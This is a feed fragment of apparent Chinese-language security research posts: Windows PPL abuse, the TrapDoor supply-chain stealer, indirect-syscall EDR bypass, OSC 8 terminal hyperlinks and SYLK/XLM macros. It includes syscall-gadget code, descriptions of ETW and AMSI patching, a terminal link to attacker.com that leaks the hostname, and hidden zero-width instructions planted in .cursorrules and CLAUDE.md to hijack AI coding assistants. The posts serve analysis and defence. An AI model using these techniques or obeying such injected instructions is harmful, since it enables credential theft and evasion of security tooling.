\n第二阶段:EDR-Freeze 竞态条件冻结。 BYOVD 驱动终止主要安全进程后,利用 WerFaultSecure.exe 竞态条件冻结残留的 Defender 组件,防止其恢复或上报异常状态。
\n第三阶段:ClipUp.exe PPL 代理篡改。 利用 PPL 保护的 ClipUp.exe 作为代理,篡改 Defender 二进制文件及注册表项。由于 ClipUp.exe 运行在 PPL 上下文中,其文件系统操作对安全产品不透明。
\n第四阶段:自定义 WDAC 策略部署。 Defender 被禁用后部署未签名的 Windows Defender 应用程序控制策略,专门阻止杀软可执行文件启动,形成持续性的安全真空。
\n完成清理后,攻击者通过创建恶意服务、监控受信系统进程、在进程被终止时重新注入组件等手段建立持久化。
\nPPL 的根本缺陷在于其信任模型的循环论证:进程因签名而被信任;合法进程因受信任而被授予对安全进程的特殊访问权限。问题不在于签名的密码学强度,而在于签名验证未区分设计用途与被滥用用途。
\nWerFaultSecure.exe 设计意图是收集崩溃转储以诊断系统稳定性问题,需要 WinTcb 权限访问受保护进程内存——这是合理需求。但当攻击者在竞态条件中将其用作安全进程冻结器,该二进制文件的功能从诊断辅助变为安全拆除工具,而其签名和权限没有发生变化。同样的逻辑适用于 ClipUp.exe,其设计意图是处理剪贴板操作,但当攻击者以特定参数启动时,其加载的 DLL 和执行代码完全脱离了原始设计范围。
\n安全产品面临结构性难题:如何检测一个在系统信任层级中比自己更高或同等的进程在滥用其特权?PPL 反恶意软件进程有能力检测和阻止用户态恶意代码,但当恶意代码运行在同等甚至更高 PPL 级别的上下文中,监测逻辑即告失效。
\nEDR 的自我防护机制——包括 PPL 保护、防篡改和进程自我保护——在此攻击模型下被结构性绕过。攻击者不需要直接攻击安全产品,只需找到以合法 PPL 上下文执行操作的方法,而这些操作恰好具备破坏安全产品的能力。
\n更深层的挑战在于:Windows 操作系统本身缺乏对 PPL 特权滥用的内置审计机制。当 WerFaultSecure.exe 被用于调试安全进程时,Windows 不会记录该行为为可疑,因为从操作系统视角看,这是 WinTcb 可信进程在执行设计功能。
\n针对 PPL 滥用的检测需要从静态信任转向行为监控:
\n2026 年,微软已开始推行针对交叉签名根程序签发驱动程序的信任移除政策,但这一措施主要作用于 BYOVD 层面,未触及 PPL 信任模型的根本缺陷。只要 Windows 将继续数字签名等同于运行期信任,只要 WinTcb 层级二进制可被用户态调用,PPL 滥用技术的生命周期便远未结束。
\nPPL 的设计缺陷不在于密码学或访问控制机制的强度,而在于其将编译时签名验证等同于运行时行为可信的语义鸿沟。EDR-Freeze、ClipUp 代理与 COM 接口操控三类技术从不同角度利用了这一缺陷,而四阶段融合攻击链模型进一步展示了其组合利用的现实威胁。对防御方而言,行为基线监控与 WDAC 策略虽无法根除问题,但能显著提高攻击成本。
\n[1] Zero Salarium. \"EDR-Freeze: Bypassing PPL with WerFaultSecure Race Condition.\" https://github.com/TwoSevenOneT/EDR-Freeze
\n[2] Elastic Security Labs. \"RONINGLOADER Analysis: ClipUp.exe PPL Abuse by Dragon Breath APT.\"
\n[3] Mohamed Fakroud, Jimmy Bayne. \"COM .NET Code Execution via DCOM Object Pointer Manipulation.\" IBM X-Force Research. https://github.com/T3nb3w/ComDotNetExploit
\n[4] Forshaw. \"PPL Bypass via WaaSRemediation COM IDispatch Interface.\" https://github.com/xforcered/ForsHops
\n[5] Microsoft. \"Protected Processes in Windows.\" MSDN Documentation.
", "url": "https://www.ce.ac.cn/blog/ppl-abuse-technical-analysis/", "title": "Windows 受保护进程轻量级滥用技术分析与攻击链建模", "summary": "针对 Windows PPL 信任模型的结构性缺陷分析,涵盖 EDR-Freeze 竞态条件、ClipUp 二进制代理及 COM 对象操控三类滥用技术,并构建四阶段融合攻击链模型。", "date_modified": "2026-05-25T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Disclosure" ] }, { "id": "https://www.ce.ac.cn/blog/trapdoor-supply-chain-attack-analysis/", "content_html": "2026年5月22日至5月24日,一场代号 TrapDoor 的大规模跨生态系统供应链攻击活动被披露。攻击者同时针对 npm、PyPI 和 Crates.io 三大软件包仓库发布超过 34 个恶意包及 384 余个关联版本,专门针对加密货币、DeFi、Solana 生态及 AI 开发社区的开发者群体。本次攻击展现出高度的跨平台协调性,利用各生态系统特有的执行机制实现恶意代码触发,并创新性地引入 AI 编程助手配置投毒技术。本文从攻击基础设施、多平台载荷机制、AI 定向注入与数据窃取模型四个维度进行技术分析。
\n关键词:供应链攻击;跨生态攻击;npm;PyPI;Crates.io;AI 投毒
\n软件供应链攻击已成为当前最具威胁性的攻击范式之一。2026年以来,Shai-Hulud、node-ipc 劫持等系列攻击事件表明,攻击者正从机会主义的 typosquatting 向高度组织化的定向攻击演进。TrapDoor 是该趋势的最新代表——它并非模仿流行包名诱骗随机用户安装,而是伪装成特定领域专业工具,精准定位加密货币与 AI 开发等高价值目标群体。
\nTrapDoor 的特殊之处在于四个维度的技术突破:跨三大包管理器的协同执行、针对 AI 编程助手的配置投毒、多层级持久化驻留机制、以及基于密钥派生密码学(Fernet + ECDH)的载荷加密。
\n攻击者以 GitHub 账号 ddjidd564 为核心运营节点,维护了大量伪装为安全审计与开发工具的仓库。npm 账号 asdxzxc、PyPI 账号 asdmini67 与 dae5411 分别用于对应生态的包发布。C2 与载荷托管统一指向 ddjidd564.github.io,数据外泄通过 GitHub Gist API 完成。
攻击者的 GitHub 仓库矩阵涵盖三大类:载荷托管仓库(defi-security-best-practices)、攻击文档仓库(AUDIT-MATRIX.md、PAYLOAD.md、BYPASS.md、SWARM.md)及诱饵工具仓库(env-security-scanner、smart-contract-audit-toolkit、defi-profit-scanner 等)。其中 AUDIT-MATRIX.md 详细描述了代号为\"Universal AI Agent Extraction Framework\"的攻击框架设计,表明该攻击经过了体系化的前期规划。
攻击者针对不同包管理器的执行机制设计了差异化载荷触发路径:
\n| 平台 | 触发机制 | 载荷类型 | 加密方式 | 外泄通道 |
|---|---|---|---|---|
| npm | postinstall 钩子 | trap-core.js (1,149行, 48KB) | Fernet + ECDH | GitHub Gist API |
| PyPI | __init__.py 导入时执行 | 远程 JS 载荷 | — | 通过 node -e 执行 |
| Crates.io | build.rs 编译期执行 | XOR 加密数据 | XOR key: cargo-build-helper-2026 | GitHub Gist API |
三类载荷的最终数据外泄统一经攻击者的 GitHub Gist 通道完成,构成一条\"多点投放、统一回传\"的攻击流水线。
\nnpm 平台的恶意包通过 postinstall 脚本在 npm install 完成后自动执行。所有 npm 恶意包共享同一份核心载荷 trap-core.js,该载荷以 Fernet 对称加密结合 ECDH 密钥交换的混合加密方案保护,其密码学方案复杂度远高于典型恶意包。
trap-core.js 在受感染主机上的执行流程可归纳为以下阶段:
~/.ssh/、AWS 凭证(环境变量、配置文件、IMDS)、GitHub Token(gh auth token 及 .npmrc)、Sui/Solana/Aptos 钱包数据、浏览器扩展钱包数据、浏览器登录数据库与 Cookie、环境变量及 .env 文件PyPI 恶意包利用 Python 导入机制的特性,在 __init__.py 中植入恶意代码。用户执行 import 语句时恶意代码即被触发。该代码从 ddjidd564.github.io 下载远程 JavaScript 载荷,并通过 node -e 在本地 Node.js 运行环境中执行。
该设计的技术考量在于:外部托管载荷可随时更新而无需重新发布 PyPI 包;Python 与 Node.js 跨语言执行增加了静态分析的难度;动态载荷获取可规避基于签名的检测机制。
\nRust 包的恶意载荷嵌入在 build.rs 构建脚本中,在 cargo build 编译阶段自动执行。这是一个关键的时序优势——开发者在运行任何包功能代码之前即已被感染。
build.rs 脚本专门针对 Sui 和 Move 生态开发者。其执行逻辑为:搜索本地 Sui 密钥库文件,使用硬编码的 XOR 密钥 cargo-build-helper-2026 加密窃取数据,通过 GitHub Gist API 外泄。密钥库的泄露意味着对应的加密资产可能被攻击者完全控制。
TrapDoor 最具创新性的技术维度是针对 AI 编程助手的配置投毒,该攻击向量在现有公开文献中尚无先例。
\n攻击者在 .cursorrules 和 CLAUDE.md 文件中植入包含零宽度 Unicode 字符(U+200B、U+200C、U+200D、U+FEFF)的隐藏指令。这些字符在正常文本渲染下不可见,但 AI 编程助手(Cursor、Claude Code)在解析配置文件时会将其识别为有效指令内容。
隐藏指令伪装为\"安全扫描\"工作流定义,诱导 AI 助手在开发者交互过程中执行后台数据收集与窃取操作。由于 AI 助手在执行配置指令时通常不会产生显著的可疑系统调用,该攻击路径在运行时层面具有较高的隐蔽性。
\n攻击者向多个知名 AI/开发工具项目提交了包含恶意配置修改的 Pull Request,涉及的仓库包括 browser-use/browser-use、langchain-ai/langchain、langflow-ai/langflow、run-llama/llama_index、FoundationAgents/MetaGPT 及 OpenHands/OpenHands。若 PR 被合并,恶意配置文件将随主流项目的版本发布扩散至大量下游用户。
攻击者在 ddjidd564.github.io/defi-security-best-practices/ 部署了一个渲染正常的 HTML 网站,伪装为 DeFi 安全最佳实践指南。该网站的核心目的是诱导 AI 助手在访问时运行其内嵌的恶意安全扫描指令,从而实现不依赖包安装的间接感染路径。
trap-core.js 的凭证枚举覆盖范围涵盖以下领域:
~/.ssh/)、环境变量及 .env 文件gh auth token 与 .npmrc 扫描)攻击者在受感染主机上建立多层持久化机制,确保即使部分驻留被清除仍可恢复访问:
\n| 持久化路径 | 技术手段 | 触发场景 |
|---|---|---|
.cursorrules | AI 配置文件注入 | AI 编程助手启动时 |
CLAUDE.md | Claude 配置文件注入 | Claude Code 交互时 |
| Git Hooks | pre-commit / post-merge 钩子 | 代码提交或合并时 |
| Shell Hooks | .bashrc / .zshrc 修改 | 终端启动时 |
| systemd | 系统服务注册 | 系统开机时 |
| cron | 定时任务 | 周期性执行 |
| SSH 传播 | 复用窃取 SSH 密钥 | 横向移动至相邻主机 |
trap-core.js 中集成了基于窃取 SSH 密钥的横向移动能力。攻击者利用 ~/.ssh/id_* 私钥尝试连接已知主机列表,将受感染的开发机转换为入侵组织内部网络的初始跳板。该机制使攻击面从单一开发机扩展至整个组织内部网络。
| 场景 | 风险等级 | 说明 |
|---|---|---|
| 安装过恶意 npm 包的开发环境 | 极高 | 全面凭证窃取与持久化 |
| 导入过恶意 PyPI 包的 Python 项目 | 极高 | 远程载荷执行 |
| 编译过恶意 Crates.io 包的 Rust 项目 | 极高 | 编译期密钥库窃取 |
| AI 配置文件被修改的项目 | 高 | AI 工具配置污染 |
| CI/CD 环境依赖恶意包 | 极高 | 构建服务器全面失陷 |
TrapDoor 体现了供应链攻击的五个演进方向:
\n基于 TrapDoor 的技术特征,可预期以下趋势:AI 开发环境配置将成为供应链攻击的新焦点;Crypto 开发者持续成为高价值目标;构建时执行攻击(如 Rust build.rs 模式)将扩展至其他编译型语言;跨生态关联攻击的隐蔽性将持续提升。
| 行为特征 | 检测方法 |
|---|---|
| npm 安装后 Node 进程异常执行大量文件扫描 | 监控安装时的子进程活动 |
向 ddjidd564.github.io 的 HTTP 请求 | DNS/网络流量监控 |
gh auth token 命令异常执行 | 命令行审计 |
~/.ssh/、~/.aws/ 目录批量读取 | 文件系统监控 |
| GitHub Gist API 未授权上传请求 | API 调用审计 |
node -e 执行远程下载的 JavaScript | 进程创建监控 |
package-lock.json / Cargo.lock / poetry.lock 避免自动升级ignore-scripts=true.cursorrules / CLAUDE.md 中的零宽度 Unicode 字符,可使用 cat -v 或 hexdump -C 检测.cursorrules 和 CLAUDE.md 纳入代码审查范围TrapDoor 代表了供应链攻击从机会主义向定向化、组织化演进的重要里程碑。其跨生态系统协同执行、AI 开发环境投毒与多层持久化机制的三重结合,构建了当前公开文献中最复杂的供应链攻击模型之一。对防御方而言,单一生态的安全监控已不足以应对此类威胁,建立跨平台行为关联分析与 AI 工具链安全审计能力将成为供应链安全的关键防线。
\n[1] Socket Research Team. \"TrapDoor: Large-Scale Cross-Ecosystem Crypto-Stealer Targets npm, PyPI, and Crates.io.\" https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates
\n[2] CVE Program. \"CVE-2026-9082.\" https://www.cve.org/CVERecord?id=CVE-2026-9082
", "url": "https://www.ce.ac.cn/blog/trapdoor-supply-chain-attack-analysis/", "title": "TrapDoor 供应链攻击分析:跨生态系统加密货币窃取与 AI 定向注入技术", "summary": "针对 TrapDoor 跨生态系统供应链攻击的技术分析,涵盖 npm、PyPI、Crates.io 三类包管理器的协同攻击机制与 AI 开发环境定向注入手法。", "date_modified": "2026-05-25T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Disclosure" ] }, { "id": "https://www.ce.ac.cn/blog/indirect-syscall-edr-bypass-analysis/", "content_html": "端点检测与响应(EDR)系统在过去三年中逐步建立了基于调用栈验证(Call Stack Validation)的检测体系,用于识别直接系统调用(Direct Syscalls)等恶意行为。间接系统调用(Indirect Syscalls)技术通过跳转到 ntdll.dll 中已有的 syscall 指令来执行系统调用,使 EDR 的调用栈验证机制完全失效——从 EDR 的检测视角来看,syscall 指令确实是从合法的 ntdll.dll 内存区域发起的。本文对间接系统调用的技术原理、与直接系统调用的差异、动态 SSN 解析方法及完整执行流程进行了系统分析,并从内核态验证、模块完整性检查及遥测完整性监控三个维度提出了相应的防御建议。
关键词:间接系统调用;EDR 绕过;调用栈验证;SSN 解析;Windows 安全
\n系统调用(System Call)是用户态程序请求内核服务的标准接口。在 Windows 平台上,系统调用通过 syscall 指令从用户态切换到内核态,由内核执行具体的系统服务。EDR 系统的用户态钩子通过在 ntdll.dll 的导出函数入口处插入跳转指令(jmp 或 mov r10, rcx + jmp),实现对敏感系统调用的监控。
传统的直接系统调用(Direct Syscalls)技术通过在自己的二进制文件中直接执行 syscall 指令来绕过用户态钩子。然而,EDR 厂商通过在异常检测规则中加入调用栈验证——检查 syscall 指令执行时的返回地址是否在 ntdll.dll 范围内——使该技术在 2024 年后逐渐失效。
间接系统调用(Indirect Syscalls)是这一攻防博弈的最新演进。其核心思想是不再在攻击者代码中执行 syscall 指令,而是跳转到 ntdll.dll 中已有的 syscall 指令来执行系统调用。这使得调用栈验证完全失效,因为从 EDR 的视角来看,syscall 指令确实是从合法的 ntdll.dll 内存区域发起的。
在 Windows x64 平台上,一个正常的系统调用路径如下:
\n应用程序 → kernel32.dll → ntdll.dll → syscall 指令 → 内核
以 NtAllocateVirtualMemory 为例,ntdll.dll 中对应的存根(stub)函数结构如下:
; ntdll.dll 中的 NtAllocateVirtualMemory
mov r10, rcx
mov eax, 18h ; 系统服务编号(SSN)
syscall ; 切换到内核态
ret
EDR 的用户态钩子通常将函数入口的前几个字节替换为跳转指令,将执行流重定向到 EDR 的检测模块。
\n调用栈验证是 EDR 用于检测直接系统调用的关键技术。其原理如下:当检测模块被调用时,回溯调用栈(Stack Walk),检查返回地址所属的内存模块。如果 syscall 指令的返回地址不在 ntdll.dll 范围内,则判定为可疑的直接系统调用行为。
直接系统调用之所以被检测,根本原因在于 syscall 指令从攻击者二进制文件的内存区域执行,调用栈中会留下异常的返回地址记录。
间接系统调用的核心思想是:不再在攻击者代码中执行 syscall 指令,而是跳转到 ntdll.dll 中已有的 syscall 指令来执行系统调用。两种方式的对比:
; 直接系统调用 — EDR 可检测到异常的返回地址
mov r10, rcx
mov eax, 18h ; SSN
syscall ; 从攻击者二进制中执行 → EDR 告警
ret
; 间接系统调用 — EDR 看到返回地址在 ntdll.dll 范围内
mov r10, rcx
mov eax, 18h ; SSN
jmp qword ptr [syscall_addr] ; 跳转到 ntdll 内的 syscall 指令
从 EDR 的视角来看,间接系统调用的执行路径完全合法——syscall 指令从 ntdll.dll 的代码段执行,调用栈验证无法区分该调用是由正常程序逻辑还是由攻击者代码触发。
间接系统调用的关键在于在 ntdll.dll 中定位未被钩子篡改的 syscall 指令。定位方法如下:
GetModuleHandleA 获取 ntdll.dll 的基址syscall 指令的特征码 0x0F 0x05UINT_PTR find_syscall_gadget(const char* func_name) {
HMODULE ntdll = GetModuleHandleA(\"ntdll.dll\");
FARPROC func_addr = GetProcAddress(ntdll, func_name);
BYTE* ptr = (BYTE*)func_addr;
for (int i = 0; i < 32; i++) {
if (ptr[i] == 0x0F && ptr[i + 1] == 0x05) {
return (UINT_PTR)&ptr[i];
}
}
return 0;
}
系统服务编号(System Service Number, SSN)在不同 Windows 版本间存在差异,因此需要在运行时动态解析。SSN 通常存储在 ntdll.dll 导出函数入口偏移 +4 字节处。对于已被 EDR 钩子篡改的函数,需要使用以下方法推算 SSN:
间接系统调用的完整执行流程如下:
\n攻击者代码 ntdll.dll 内存空间
| |
|--- mov r10, rcx -------------> |
|--- mov eax, SSN -------------> |
|--- jmp [syscall_addr] -------> |
| syscall | ← 从 ntdll.dll 执行
| ret |
|<--------- 返回 <----------------|
|
EDR 视角:调用栈显示 syscall 从 ntdll.dll 发起
返回地址在 ntdll.dll 范围内 → 判定为合法
EDR 调用栈验证的盲区在于:它只能检查 syscall 指令的返回地址归属,而无法区分该执行流是由正常代码跳转而来,还是由直接系统调用触发。
在实际红队操作中,间接系统调用通常与其他绕过技术组合使用,形成完整的防御绕过链:
\n| 层级 | 技术 | 目标 |
|---|---|---|
| 1 | 间接系统调用 | 绕过用户态钩子与调用栈验证 |
| 2 | ETW Patch | 盲化事件遥测(EtwEventWrite → RET) |
| 3 | AMSI Bypass | 盲化脚本扫描(AmsiScanBuffer → E_INVALIDARG) |
| 4 | 睡眠加密 | 休眠时加密内存中的 Beacon 载荷 |
| 5 | 模块踩踏 | 加载合法 DLL 后覆写其 .text 段写入载荷 |
其中,ETW Patch 的实现为将 ntdll.dll 中的 EtwEventWrite 函数入口替换为 RET 指令(0xC3),使 Windows 事件追踪系统无法记录后续的可疑行为。AMSI Bypass 则将 amsi.dll 中的 AmsiScanBuffer 函数入口修改为返回 E_INVALIDARG(0x80070057),使脚本扫描引擎失效。
EDR 系统应部署内核传感器,在内核层验证调用链的完整性。与用户态调用栈验证不同,内核态验证可以捕获从异常上下文发起的系统调用,且不受用户态钩子的影响。
\n监控进程的模块加载行为,检测异常的模块加载模式。对于调用敏感系统调用但导入表中缺乏对应函数条目的进程,应产生告警。同时,周期性校验关键 DLL(如 ntdll.dll、amsi.dll)的代码完整性,检测是否被篡改。
检测 EtwEventWrite、AmsiScanBuffer 等关键遥测函数的篡改行为。当发现这些函数的入口被修改为 RET 或其他异常指令时,应立即产生高优先级告警。
在关键进程(如 lsass.exe)中植入金丝雀令牌(Canary Token),当攻击者尝试通过间接系统调用来枚举或访问受保护资源时触发告警。
间接系统调用技术代表了 EDR 绕过技术从\"绕过钩子\"到\"绕过调用栈验证\"的范式演进。它利用了调用栈验证机制的固有盲区——该机制只能验证 syscall 指令的执行来源,而无法区分该执行流是由正常代码跳转产生还是由恶意代码构造。这一盲区的存在表明,基于单一维度的检测机制在持续的攻防博弈中具有有限的有效期。构建多层、多维度、覆盖用户态与内核态的纵深检测体系,是对抗此类攻击的根本路径。
[1] Safety Research Team. \"Indirect Syscalls: Defeating EDR Call Stack Validation.\" https://blog.sektor7.net/
\n[2] Microsoft Corporation. \"Windows System Call Interface.\" https://learn.microsoft.com/en-us/windows-hardware/drivers/
\n[3] Smithson, M. \"SysWhispers: System Call Stub Generation.\" https://github.com/jthuraisamy/SysWhispers
\n[4] Microsoft Corporation. \"Anti-Malware Scan Interface (AMSI).\" https://learn.microsoft.com/en-us/windows/win32/amsi/
\n[5] MDSec Research. \"Indirect System Calls in Practice.\" https://www.mdsec.co.uk/research/
", "url": "https://www.ce.ac.cn/blog/indirect-syscall-edr-bypass-analysis/", "title": "间接系统调用技术分析与评估:针对 EDR 调用栈验证机制的绕过方法", "summary": "针对间接系统调用(Indirect Syscalls)技术的系统性分析,研究其绕过 EDR 调用栈验证机制的原理、实现方法及检测对策。", "date_modified": "2026-05-21T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Linux" ] }, { "id": "https://www.ce.ac.cn/blog/osc8-terminal-hyperlink-security-analysis/", "content_html": "OSC 8(Operating System Command 8)超链接转义序列允许终端模拟器在纯文本输出中嵌入可点击的超链接。这一设计显著增强了终端交互的可用性,但也引入了一个被广泛忽视的攻击面:攻击者可通过注入恶意的 OSC 8 序列,将终端从被动的信息显示设备转变为半主动的交互界面,使用户的单一点击行为即可触发本地资源访问或远程请求。本文对 OSC 8 协议的底层语法、跨平台注入向量、file:// URI 的行为差异以及现有安全防御机制进行了系统性分析,并在纵深防御体系框架下评估了此类非代码执行攻击面的真实威胁等级。
\n关键词:OSC 8;终端安全;转义序列注入;攻击面建模;纵深防御
\n终端模拟器是现代软件开发与系统管理中的核心交互入口。长期以来,终端被视为一种\"被动显示设备\"——其输出流中的文本内容仅供用户阅读,不具备交互能力。OSC 8 超链接转义序列的引入打破了这一假设,使得终端输出能够嵌入可点击的交互元素,从而将终端升级为\"半主动交互界面\"。
\n这一变化带来的安全影响是深远的。在传统攻击模型中,攻击者需要通过社会工程学诱骗用户手动复制并执行恶意命令;而 OSC 8 序列使得这一过程简化为一次点击。值得注意的是,OSC 8 并非安全漏洞,而是一项被主流终端模拟器广泛支持的公开协议标准。因此,其攻击面属于协议特性的非预期使用范畴,具有隐蔽性强、检测难度高的特点。
\n本文的主要贡献包括:(1)对 OSC 8 协议语法及终端实现进行了系统梳理;(2)分析了 Windows 与 Linux 平台下 file:// URI 的行为差异及相关安全限制;(3)梳理了主流通用攻击向量与组合攻击手法;(4)从终端模拟器、操作系统及用户行为三个层面提出了纵深防御建议。
\nOSC(Operating System Command)是终端控制序列中的一个功能族,由转义字符 ESC ](ASCII 码 \\x1b])引入。OSC 8 专门用于定义超链接,其完整格式如下:
ESC ] 8 ; params ; uri ST
其中 ST(String Terminator)为标准字符串终止符,亦可使用 BEL 字符(\\x07)作为终止符:
ESC ] 8 ; params ; uri BEL
当需要关闭超链接作用域时,发送空 URI 的 OSC 8 序列:
\nESC ] 8 ; ; BEL
位于开启序列与关闭序列之间的文本内容,将被终端模拟器渲染为超链接样式。用户点击后,终端将调用操作系统默认处理程序打开指定的 URI。
\n参数 params 字段可为空,亦可包含键值对(如 id=myid),主要用于标识和分组链接,在多数终端实现中可忽略。
OSC 8 协议已获得主流终端模拟器的广泛支持,包括但不限于:
\n该协议的广泛支持意味着攻击向量具有跨平台的普适性。
\n攻击者可通过以下途径将恶意 OSC 8 序列写入目标用户的终端输出流:
\n恶意软件或脚本输出:当用户执行攻击者控制的脚本(如通过 curl | bash 管道执行未验证代码,或解压并运行恶意安装脚本)时,脚本除显示正常信息外,可向标准输出流中写入经编码的 OSC 8 序列。
会话污染:攻击者在获取远程主机的控制权后,可向连接中的终端会话写入恶意转义序列。此类攻击在共享的 SSH 会话环境中尤为常见。
\n日志文件投毒:当用户通过 cat、tail、less 等工具查看被污染的文件时,若文件内容包含 OSC 8 序列,终端将在渲染阶段解析并显示可点击的超链接。
多路复用写入:在 Linux 系统中,具有适当权限的进程可向同一主机的其他终端设备(/dev/pts/N)写入数据。若目标终端未启用 mesg n,攻击者可以从同一主机的另一个终端会话直接注入恶意序列。
为了验证不同终端模拟器与操作系统对 OSC 8 超链接的处理方式,我们构建了以下测试用例:
\n# Windows PowerShell 环境
$esc = [char]0x1b; $bel = [char]0x7
Write-Host \"${esc}]8;;file:///C:/Windows/System32/calc.exe${bel}Click here${esc}]8;;${bel}\"
在 Windows 11 的 PowerShell 控制台中执行上述命令后,终端会渲染一个可点击的文本\"Click here\"。点击行为触发系统的 URI 调度机制,对 file:// 协议进行处理。
Linux 环境下使用等效命令:
\nprintf '\\e]8;;file:///usr/bin/gnome-calculator\\e\\\\Click here\\e]8;;\\e\\\\'
同样可在支持的终端模拟器中生成可点击的超链接。
\n然而,不同操作系统对 file:// URI 的处理存在显著差异:
Windows 平台:Windows 通过 URLACTION_LOCAL_EXEC 安全机制和本地计算机区域锁定策略,默认禁止从非浏览器上下文启动 file:// 协议关联的可执行文件(.exe、.bat 等)。因此,直接从终端点击 file:///C:/Windows/System32/calc.exe 在完全更新的 Windows 11 上不会直接执行。但是,指向非可执行文件或目录的 file:// URI 仍可正常打开。
Linux 平台:大多数现代 Linux 桌面环境(GNOME、KDE Plasma)的文件管理器在收到 file:// 请求时,会根据文件类型执行关联操作。对于不可执行文件,通常使用关联程序打开;对于可执行文件,文件管理器通常使用文本编辑器打开或弹出安全确认对话框。最新版本的 GNOME 已引入针对终端触发的 file:// 链接的安全确认机制。
尽管直接通过 file:// URI 执行可执行文件在主流操作系统上已受到严格限制,攻击者仍可利用 OSC 8 实现以下组合攻击:
信息收集型钓鱼:构造指向攻击者控制的 HTTP 服务器的超链接(如 https://attacker.com/collect?host=$(hostname)),在用户点击时通过 HTTP 请求泄露主机标识信息。
SMB 凭据中继:使用 file://attacker-server/share/file 路径,诱使 Windows 系统尝试 NTLM 认证,从而捕获并中继用户的凭据哈希。
多序列组合攻击:将 OSC 8 与 OSC 52(剪贴板操作序列)等终端控制序列结合,构造更复杂的攻击链路。例如,先通过 OSC 52 将恶意命令写入用户剪贴板,再通过 OSC 8 诱骗用户粘贴执行。
\n超链接功能控制:部分终端模拟器(如 Konsole)允许用户在配置中完全禁用超链接渲染。Windows Terminal 目前不提供直接的关闭选项,但可通过实验性渲染参数间接影响行为,可靠性有限。
\n协议白名单:终端模拟器可在渲染 OSC 8 序列时对 URI 的协议部分进行安全校验,仅允许 http 与 https 协议,拦截 file、javascript 等具有本地资源访问能力的协议。iTerm 2 已实现可配置的协议白名单功能。
用户确认机制:在打开任何非 HTTP(S) 协议链接前弹出安全确认对话框,提示用户即将执行的操作类型及目标资源。GNOME Terminal 的最新版本已引入类似机制。
\nLinux:保持 mesg n 的默认配置,防止未经授权的跨会话终端写入;通过 SELinux 或 AppArmor 对终端设备的访问实施细粒度控制。
Windows:保持本地计算机区域锁定安全性为默认启用状态;通过组策略禁止 file:// 协议直接启动可执行文件;使用 Windows Defender Application Control(WDAC)限制未签名程序的执行。
对于终端输出流中突然出现的、缺乏上下文关联的可点击链接,用户应保持基本的警惕。此外,以下操作可有效降低风险:
\ncurl | bash 等管道执行模式;cat -v 或 less 查看可疑文件,这些工具默认会转义控制字符,使隐藏的转义序列可视化;OSC 8 超链接转义序列是终端现代化进程中的自然产物,其设计显著提升了终端输出的交互性与协作体验。然而,任何打破\"终端输出为纯文本\"这一基本假设的特性,都会引入新的攻击面。
\n当前,主流操作系统的安全策略已将直接通过终端 file:// 链接启动可执行文件的路径封堵大半。但攻击向量正在向组合攻击方向迁移——通过与 SMB 中继、信息窃取、社交工程等手法相结合,OSC 8 序列仍然具备作为攻击链条中初始跳板的实际威胁能力。
对防御者而言,理解终端控制序列处理机制已不再是边缘化的技术知识,而是系统攻击面评估的基本组成部分。随着终端模拟器不断引入新的交互特性(如 OSC 52 剪贴板操作、Terminal shell integration 等),每一次特性扩展都可能产生新的安全边界,需要持续的威胁建模与防御策略更新。
\n[1] The xterm Project. \"OSC 8 - Hyperlinks.\" https://gist.github.com/egmontkob/eb114294efbcd5adb1944c9f3cb5feda
\n[2] Microsoft Corporation. \"Windows Terminal Documentation.\" https://learn.microsoft.com/en-us/windows/terminal/
\n[3] GNOME Project. \"GNOME Terminal Security Updates.\" https://gitlab.gnome.org/GNOME/vte
\n[4] iTerm2 Project. \"iTerm2 OSC 8 Configuration.\" https://iterm2.com/documentation-escape-codes.html
", "url": "https://www.ce.ac.cn/blog/osc8-terminal-hyperlink-security-analysis/", "title": "终端模拟器 OSC 8 超链接转义序列的安全威胁分析与攻击面建模", "summary": "针对 OSC 8 终端超链接协议的系统性安全分析,研究其在 Windows/Linux 终端中的注入向量、file:// URI 跨平台行为差异及纵深防御机制。", "date_modified": "2026-05-21T00:00:00.000Z", "author": { "name": "ICE Lab" }, "tags": [ "Vulnerability", "Research", "Linux", "Kernel Security" ] }, { "id": "https://www.ce.ac.cn/blog/sylk-xlm-macro-security-analysis/", "content_html": "SYLK(Symbolic Link)文件格式诞生于 1980 年代,设计目标为仅使用可显示 ANSI 字符实现跨应用程序的表格数据交换。该格式至今仍被 Microsoft Office 默认映射至 Excel 应用程序。本文揭示了一个被广泛忽视的攻击面:SYLK 文件可直接承载 Excel 4.0/XLM 宏指令,且在当前安全生态中几乎未被充分认知与检测。与受到层层监视的 VBA 宏不同,XLM 宏在 SYLK 容器中的复活为攻击者提供了一条低风险、高成功率的攻击通道。本文系统分析了 SYLK 格式在受保护视图豁免、邮件与浏览器网关绕过、AMSI 盲区等方面的安全缺陷,并提出了多层次防御建议。
\n关键词:SYLK;XLM 宏;Excel 安全;攻击面分析;AMSI 盲区
\n在攻击者与防御者的持续对抗中,一个反复出现的规律是:最新锐的攻击手法总是受到最严密的监控,而最古老的合法功能却常常成为完美的隐匿空间。SYLK 文件格式正是这一规律的最新注脚。
\n此前,安全研究员 Matt Nelson 已演示过将 DDE(动态数据交换)攻击与 SYLK 格式相结合的方法,且该技术已被多起真实恶意软件样本所采用。本文在此基础上进一步揭示一个更为严重的滥用维度:SYLK 可以直接承载 Excel 4.0/XLM 宏,且这一能力在当前安全检测体系中几乎未被充分覆盖。在 VBA 宏已受到 AMSI 扫描、受保护视图沙箱等多重监视的今天,XLM 宏在 SYLK 容器中的复活,为攻击者提供了一条完整的、从文件传输到代码执行的隐蔽攻击链。
\n本文的主要贡献包括:(1)梳理了 SYLK 格式在纵深防御体系中的特殊豁免地位;(2)分析了 XLM 宏在 SYLK 容器中的嵌入机制与执行约束;(3)研究了扩展名为 CSV 时的格式伪装攻击面;(4)评估了现有安全检测工具的有效性并分析了 AMSI 盲区产生的原因。
\nSYLK 是一种基于 ANSI 文本的表格数据交换格式,设计于 1980 年代。其核心设计原则为仅使用可显示字符,确保在不同系统间的可靠传输。SYLK 文件以 .slk 为扩展名,至今仍被 Microsoft Office 默认映射至 Excel,覆盖版本包括 2010、2013、2016 及更新版本。
SYLK 在网络防御体系中的特殊地位并非源自技术漏洞,而是源于\"默认信任\"的历史遗留问题。
